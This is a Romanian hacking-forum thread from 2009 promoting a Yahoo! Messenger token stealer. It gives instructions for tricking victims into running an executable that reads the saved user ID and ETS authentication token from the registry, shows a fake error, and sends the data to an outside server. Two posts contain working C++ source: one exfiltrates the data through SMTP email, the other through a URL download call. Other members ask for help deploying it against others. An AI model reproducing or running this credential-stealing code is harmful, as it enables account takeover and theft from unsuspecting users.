Guest chri5ty Posted February 6, 2009 Report Posted February 6, 2009 (edited) Aceasta este, probabil, ce mai simpla metoda de a sparge un cont de messenger. Da-le dra**** de keyloggere... bindere... ftp-uri.. toate ca sa furi o parola...Atunci cand te loghezi pe Yahoo! Messenger, ai optiunea de a salva id-ul si parola, pentru logari ulterioare. ID-ul se salveaza in registri, si se mai salveaza un cod, ETS, in care se memoreaza token-ul de autentificare. Din token nu se poate extrage parola.Ce inseamna asta? Daca extragi cele 2 informatii din registri, iar apoi le "plantezi" pe alt calculator, ai sa ai surpriza ca te poti loga cu id-ul si parola salvata, deci pe contul altcuiva, fara sa ii afli neaparat si parola.Simplu, nu?Am facut cu C++ un exe de dimensiuni mici, pe care il gasiti arhivat aici. Cand este lansat in executie, el extrage id-ul si ETS-ul, si le trimite pe un server. Cateva explicatii pe engleza, mai gasiti aici.Dati exe-ul la cineva, si il convingeti sa il deschida. Programul va afisa un mesaj fals de eroare. Intrati pe http://it.octopis.com/ets.php, scrieti id-ul, si vedeti daca operatia a avut succes. Daca da, se va afisa id-ul si codul ETS. Click pe id, ca sa descarcati un fisier .REG, pe care il executati. Deschideti messenger-ul si surpriza!! Te-ai logat pe acel id! Ai acces la tot contul de Yahoo! + ca din moment ce ai acces la contul de e-mail, poti sa ii spargi conturile de pe hi5 / netlog / tagged (+ inca alte porcarii de saituri)...SPOR LA FURAT!Programul e mic si este bazat pe un principiu foarte simplu, iar sursa o tin sub cheie, pentru cei curiosi.Saitul it.octopis.com e saitul meu, asa ca nu strica sa azvarliti o privire. Am pus 3-4 programele si mi-e o lene... sa mai adaug cateva. Edited February 6, 2009 by chri5ty Quote
Hertz Posted February 6, 2009 Report Posted February 6, 2009 Daca nu ne arati si sursa nu esti TRU. Quote
MostWanteD Posted February 6, 2009 Report Posted February 6, 2009 interesanta treaba..da tu practic ai acces la toate id`urile de acolo ... Quote
fLr^ Posted February 7, 2009 Report Posted February 7, 2009 foarte interesanta treaba, si merge foarte bine. l-am testat Quote
s33us00n Posted February 7, 2009 Report Posted February 7, 2009 and unless you make your own you'll be labelled a script kiddie Quote
Sharcky Posted February 7, 2009 Report Posted February 7, 2009 chri5ty only 17 ani?:OOEsti dat dreq la varsta asta!! Quote
Guest chri5ty Posted February 8, 2009 Report Posted February 8, 2009 Daca nu ne arati si sursa nu esti TRU.Am explicat detaliat ce face. Rasfoiti registrii, ca nu va cade mana. Localizati cele 2 chei, si scrieti-va si singuri codul. Mie mi-a incaput tot pe 15 linii. :rolleyes:Poate am sa pun sursa. Ideea era sa se gandeasca fiecare cum se face, fiindca vine un 'Copy/Paste' si adauga fragmentul de cod la programul lui, apoi il lauda ca fiind nush ce unealta a lui de hacking, un trojan "ni-no-ni-no", absolut spectaculos, insa programul de fata e "pur si simplu prea simplu".interesanta treaba..da tu practic ai acces la toate id`urile de acolo ...Exact. Pe pagina pe care dai search, eu am cativa parametri secreti, prin care vad lista de ID-uri. Cand aveam 10-20 de intrari, ma mai uitam prin ele, iar uneori am vazut ca apartin unor persoane care nu merita sa incaseze 'palme' de la un mucos de cativa ani care s-a gandit sa ii sparga contul. De cand am 50 de bucati, chiar nu ma mai intereseaza sa ma incerc fiecare ID.and unless you make your own you'll be labelled a script kiddieLa ce te referi, mai exact?chri5ty only 17 ani?:OOEsti dat dreq la varsta asta!!16.5 ani, multumesc.. Am incaput din clasa a 5-a cu HTMl-ul, cu Pascal dintr-a 6-a, iar cu C-ul dintr-a 7-a. In clasa a 9-a, in vacanta de vara, adica vara trecuta, am invatat C++ pana la perfectie. :cool: Quote
zaiet-pagadi Posted February 8, 2009 Report Posted February 8, 2009 (edited) Ok frumos programActivez deep freeze sau vmware il execut fara conexiune la internet extrag executabilul MVC++ dupa instalare il decompilez si hopa codu sursa...big deal pt. cei care vor sursa...incearca si fa-l in pascal, delphi si esti "tatic"Intrebarea este urmatoarea daca victima il executa fara conexiune la net ce se intampla?Estestocat" fisierul de log cu datele de logare undeva pe hdd si cand "vede" o bucata de net trimite datele? Edited February 8, 2009 by zaiet-pagadi Quote
Rebell Posted February 8, 2009 Report Posted February 8, 2009 Mai ai oleaca si ajungi la Microsoft tine-o tot asa Quote
Guest chri5ty Posted February 8, 2009 Report Posted February 8, 2009 Ok frumos programActivez deep freeze sau vmware il execut fara conexiune la internet extrag executabilul MVC++ dupa instalare il decompilez si hopa codu sursa...big deal pt. cei care vor sursa...incearca si fa-l in pascal, delphi si esti "tatic"Intrebarea este urmatoarea daca victima il executa fara conexiune la net ce se intampla?Estestocat" fisierul de log cu datele de logare undeva pe hdd si cand "vede" o bucata de net trimite datele?La ce iti trebuie deep freeze?(haha) E un executabil microscopic si iti garantez eu ca face ceea ce spune. Daca nu e conexiune la net, nu se stocheaza nimic. Nu m-a interesat deloc aspectul asta.Si nu cred ca il poti decompila. Poate doar daca il dezasamblezi. Si chiar si asa, nu faci decat sa imi demonstrezi ca iti lipseste o tona de creativitate. E foarte simplu, ce naiba! Ma adresez programatorilor cu un nivel sub-mediu, sau macar mediu. Quote
vfather Posted February 8, 2009 Report Posted February 8, 2009 e super simplu, in AutoIT l-am scris in 3 linii de cod. Quote
Ethereal Posted February 8, 2009 Report Posted February 8, 2009 #include <fstream>#include <iostream>#include <cstdlib>#include <windows.h>using namespace std;char data[1000];char bufferout[1000];char bufferin[1000];char ip[100];char mail[100];int port;SOCKET asock, bsock; SOCKADDR_IN sina, sinb; WSADATA wsadata;int checkKey(HKEY tree, const char *folder, char *key) { long lRet; HKEY hKey; char temp[150]; DWORD dwBufLen; // Open location lRet = RegOpenKeyEx( tree, folder, 0, KEY_QUERY_VALUE, &hKey ); if (lRet != ERROR_SUCCESS) return 0; // Get key dwBufLen = sizeof(temp); lRet = RegQueryValueEx( hKey, key, NULL, NULL, (BYTE*)&temp, &dwBufLen ); if (lRet != ERROR_SUCCESS) return 0; strcpy(data+strlen(data), temp); data[strlen(data)]=' '; // Close key lRet = RegCloseKey( hKey ); if (lRet != ERROR_SUCCESS) return 0; // Got this far, then key exists return 1;}int errorcheck(){ if(bufferin[0]=='2'&&bufferin[1]=='2'&&bufferin[2]=='0'){ return 1;} if(bufferin[0]=='2'&&bufferin[1]=='5'&&bufferin[2]=='0') return 1; if(bufferin[0]=='4'&&bufferin[1]=='2'&&bufferin[2]=='1') return 0; return 1; }int main(){ mail[0]='<'; strcpy(mail+1, "mailto@yahoo.com"); mail[strlen(mail)+2]='\0'; mail[strlen(mail)+1]='\n'; mail[strlen(mail)]='>'; for(int i=0; i<sizeof(data); i++) data[i]='\0'; checkKey(HKEY_CURRENT_USER, "Software\\Yahoo\\Pager", "ETS"); checkKey(HKEY_CURRENT_USER, "Software\\Yahoo\\Pager", "Yahoo! User ID"); login: strcpy(ip,"67.195.168.31"); port=25; WSAStartup(0x101,&wsadata); bsock=socket(AF_INET, SOCK_STREAM, 0); sinb.sin_family=AF_INET; sinb.sin_addr.s_addr=inet_addr(ip); sinb.sin_port=htons(port); connect( bsock, (SOCKADDR*) &sinb, sizeof(SOCKADDR_IN) ); recv( bsock, bufferin, sizeof(bufferin), 0); cout<<bufferin; Sleep(200); cout<<"\n"; if(!errorcheck()) { cout<<"restart"; WSACleanup(); goto login; } else cout<<"Connected.\n"; Sleep(30); //FROM strcpy(bufferout, "MAIL FROM: <ethereal@yahoo.com>\n"); cout<<"\n\n"<<bufferout<<" "<<strlen(bufferout)<<"\n\n"; send(bsock, bufferout, strlen(bufferout),0); recv( bsock, bufferin, sizeof(bufferin), 0); cout<<bufferin; //RCPT TO strcpy(bufferout, "RCPT TO: "); strcpy(bufferout+strlen(bufferout), mail); cout<<bufferout; send(bsock, bufferout, strlen(bufferout),0); recv( bsock, bufferin, sizeof(bufferin), 0); cout<<bufferin; // DATA strcpy(bufferout, "DATA\n"); send(bsock, bufferout, strlen(bufferout),0); recv( bsock, bufferin, sizeof(bufferin), 0); cout<<bufferin; Sleep(30); strcpy(bufferout, "FROM:ethereal@yahoo.com\n \nSubject: Token stealer\n\n\n"); strcpy(bufferout+strlen(bufferout), data); strcpy(bufferout+strlen(bufferout),"\n\0"); send(bsock, bufferout, strlen(bufferout),0); strcpy(bufferout, "\r\n.\r\n"); send(bsock, bufferout, strlen(bufferout),0); recv( bsock, bufferin, sizeof(bufferin), 0); cout<<bufferin; strcpy(bufferout,"quit\n"); send(bsock, bufferout, strlen(bufferout),0); cout<<"\nEnd of the world."; cin.get(); } Quote
zaiet-pagadi Posted February 8, 2009 Report Posted February 8, 2009 (edited) La ce iti trebuie deep freeze?(haha) E un executabil microscopic si iti garantez eu ca face ceea ce spune. Daca nu e conexiune la net, nu se stocheaza nimic. Nu m-a interesat deloc aspectul asta.Si nu cred ca il poti decompila. Poate doar daca il dezasamblezi. Si chiar si asa, nu faci decat sa imi demonstrezi ca iti lipseste o tona de creativitate. E foarte simplu, ce naiba! Ma adresez programatorilor cu un nivel sub-mediu, sau macar mediu.Editat...hai sa nu imi bat capul...incearca sa tii cont si de sfatul altora ca nu vei avea de pierdut Edited February 8, 2009 by zaiet-pagadi Quote
Guest chri5ty Posted February 9, 2009 Report Posted February 9, 2009 Eu am trimis parametrii prin URLDownloadToFile. URL-ul e un script php din sait + parametri, iar fisierul destinatie e nespecificat.@zaiet-pagadi - Nu inteleg, ce vrei sa zici? Quote
Hellbound Posted February 9, 2009 Report Posted February 9, 2009 eu am intrat in el da nick nu a aparut pe pagina aia Quote
Guest chri5ty Posted February 10, 2009 Report Posted February 10, 2009 eu am intrat in el da nick nu a aparut pe pagina aiaAdica cum? Ce nu iti apare?Daca voiai sa zici ca ai dat search si nu ai gasit nimic pe ID-ul respectiv, atunci e posibil ca persoana careia i-ai dat programul sa foloseasca multi-mess, caz in care nu a bifat "remember my id and password". Quote
Hellbound Posted February 10, 2009 Report Posted February 10, 2009 Te rog mult poti sa specifici sursa ?#include <fstream>#include <iostream>#include <cstdlib>#include <windows.h>using namespace std;char data[1000];char bufferout[1000];char bufferin[1000];char ip[100];char mail[100];int port;SOCKET asock, bsock; SOCKADDR_IN sina, sinb; WSADATA wsadata;int checkKey(HKEY tree, const char *folder, char *key) { long lRet; HKEY hKey; char temp[150]; DWORD dwBufLen; // Open location lRet = RegOpenKeyEx( tree, folder, 0, KEY_QUERY_VALUE, &hKey ); if (lRet != ERROR_SUCCESS) return 0; // Get key dwBufLen = sizeof(temp); lRet = RegQueryValueEx( hKey, key, NULL, NULL, (BYTE*)&temp, &dwBufLen ); if (lRet != ERROR_SUCCESS) return 0; strcpy(data+strlen(data), temp); data[strlen(data)]=' '; // Close key lRet = RegCloseKey( hKey ); if (lRet != ERROR_SUCCESS) return 0; // Got this far, then key exists return 1;}int errorcheck(){ if(bufferin[0]=='2'&&bufferin[1]=='2'&&bufferin[2]=='0'){ return 1;} if(bufferin[0]=='2'&&bufferin[1]=='5'&&bufferin[2]=='0') return 1; if(bufferin[0]=='4'&&bufferin[1]=='2'&&bufferin[2]=='1') return 0; return 1; }int main(){ mail[0]='<'; strcpy(mail+1, "mailto@yahoo.com"); mail[strlen(mail)+2]='\0'; mail[strlen(mail)+1]='\n'; mail[strlen(mail)]='>'; for(int i=0; i<sizeof(data); i++) data[i]='\0'; checkKey(HKEY_CURRENT_USER, "Software\\Yahoo\\Pager", "ETS"); checkKey(HKEY_CURRENT_USER, "Software\\Yahoo\\Pager", "Yahoo! User ID"); login: strcpy(ip,"67.195.168.31"); port=25; WSAStartup(0x101,&wsadata); bsock=socket(AF_INET, SOCK_STREAM, 0); sinb.sin_family=AF_INET; sinb.sin_addr.s_addr=inet_addr(ip); sinb.sin_port=htons(port); connect( bsock, (SOCKADDR*) &sinb, sizeof(SOCKADDR_IN) ); recv( bsock, bufferin, sizeof(bufferin), 0); cout<<bufferin; Sleep(200); cout<<"\n"; if(!errorcheck()) { cout<<"restart"; WSACleanup(); goto login; } else cout<<"Connected.\n"; Sleep(30); //FROM strcpy(bufferout, "MAIL FROM: <ethereal@yahoo.com>\n"); cout<<"\n\n"<<bufferout<<" "<<strlen(bufferout)<<"\n\n"; send(bsock, bufferout, strlen(bufferout),0); recv( bsock, bufferin, sizeof(bufferin), 0); cout<<bufferin; //RCPT TO strcpy(bufferout, "RCPT TO: "); strcpy(bufferout+strlen(bufferout), mail); cout<<bufferout; send(bsock, bufferout, strlen(bufferout),0); recv( bsock, bufferin, sizeof(bufferin), 0); cout<<bufferin; // DATA strcpy(bufferout, "DATA\n"); send(bsock, bufferout, strlen(bufferout),0); recv( bsock, bufferin, sizeof(bufferin), 0); cout<<bufferin; Sleep(30); strcpy(bufferout, "FROM:ethereal@yahoo.com\n \nSubject: Token stealer\n\n\n"); strcpy(bufferout+strlen(bufferout), data); strcpy(bufferout+strlen(bufferout),"\n\0"); send(bsock, bufferout, strlen(bufferout),0); strcpy(bufferout, "\r\n.\r\n"); send(bsock, bufferout, strlen(bufferout),0); recv( bsock, bufferin, sizeof(bufferin), 0); cout<<bufferin; strcpy(bufferout,"quit\n"); send(bsock, bufferout, strlen(bufferout),0); cout<<"\nEnd of the world."; cin.get(); }Daca asta e zimi cum o compilezi autoit , c++ ? sau te rog mult sa imi dai sursa as vrea sa imi fac si eu un aseamenea site Quote
Guest chri5ty Posted February 11, 2009 Report Posted February 11, 2009 #include <windows.h>#include <stdio.h>#pragma comment(lib,"user32.lib")#pragma comment(lib,"Urlmon.lib")void getKey(LPCSTR Path,LPCSTR Key,void*buffer){HKEY key;unsigned long type=REG_SZ, size=1024;if (RegOpenKeyEx(HKEY_CURRENT_USER,Path,0,KEY_READ,&key)!=ERROR_SUCCESS)return;RegQueryValueEx(key,Key,NULL,&type,(LPBYTE)buffer,&size);RegCloseKey(key);}int WinMain(HINSTANCE,HINSTANCE,LPCSTR,int){char buf[1024]="";char URL[1024]="****************";getKey("Software\\yahoo\\pager","Yahoo! User ID",URL+strlen(URL));getKey("Software\\yahoo\\pager","ETS",buf);strcat(URL,"********");strcat(URL,buf); if(strlen(buf)){ URLDownloadToFile(0,URL,"",0,0); MessageBox(0,"Application failed to initialize","Fatal Error",MB_ICONSTOP); }else MessageBox(0,"Unexpected error in main module","Fatal Error",MB_ICONSTOP);return 0;}Am ascuns sub *** cativa parametri, ca sa nu se floodeze baza de date. Exista o parola pentru ca intrarile sa fie acceptate. Quote
Hellbound Posted February 11, 2009 Report Posted February 11, 2009 Te rog poti sa ma faci sa inteleg Eu acest script il compilez cu c ++ ? sa obtin executabilu ?si unde modific in script sa imi pun pagina de verificare cum ai facut tu Poti face un tut sau daca asa dami add la worldextremehack@yahoo.com Quote
Ovvi Posted February 11, 2009 Report Posted February 11, 2009 am si eu o intrebare ... daca o persoana a accesat acel program... si o alta persoana ii foloseste mailu... cum poate scapa persoana care e victima ? reinstal windows ? ... sau? Quote
Hellbound Posted February 11, 2009 Report Posted February 11, 2009 Schimbandu-si parola ! Hai t rog chri5ty explicami ce te-am rugat ... Quote
Guest chri5ty Posted February 12, 2009 Report Posted February 12, 2009 Inlocuiesti ****** cu niste fragmente de URL, astfel incat, in final, sa se obtina un URL de forma "http://sait.com/cale/script.php?parametru=valoare¶metru=valoare...."E mai simplu decat pare, dar nu am sa evidentiez parametrii pe forum, ca sa nu poate nimeni sa umfle automat baza de date cu mii de intrari fara sens. Scriptul php e la fel de simplu ca si programul.Chiar se face prea multa discutie pe tema asta. Trebuia sa va dau doar ideea, iar voi, singuri, sa va faceti programele proprii. Quote
Hellbound Posted February 12, 2009 Report Posted February 12, 2009 Te rog eu frumos da-mi add la id vreau sa vorbim putin te rog eu cristi worldextremehack@yahoo.com Quote
Clyde Posted February 20, 2009 Report Posted February 20, 2009 Virus: HEUR/Malware Type: AHeAD Heuristic special detection In the wild: No Reported Infections: Low Distribution Potential: Low Damage Potential: Low Static file: No Description:HEUR/MalwareHEUR/Malware is a heuristic detection routine designed to detect common malware characteristics. Avira AntiVir recognizes unknown malware proactively using its AHeAD technology. To achieve this, Avira performs innovative structural analyzing.On the basis of the composition of a file, the sequence of significant code sequences or based on particular behavior patterns, the heuristics can determine with a high probability whether it is dealing with a harmful or virulent file.HEUR/Malware in particular is reported when a program seems to contain suspicious functionality.In the unlikely occurrence of a false positives we would kindly ask for your help and send the file to our virus lab using the quarantine functionality of AntiVir.A heuristic detection might be a false identification if one or more of the following are true:- The program has been used for a very long time and is known to the user- The program was installed by the user himself- The program is from a trustworthy sourcePlease note that even old programs can get infected or replaced by malware without your knowledge. Besides that trustworthy sources might have become compromised themselves.In order to enhance detection and reduce the rate of false positives we recommend you to send the file to our virus lab for further analysis. Quote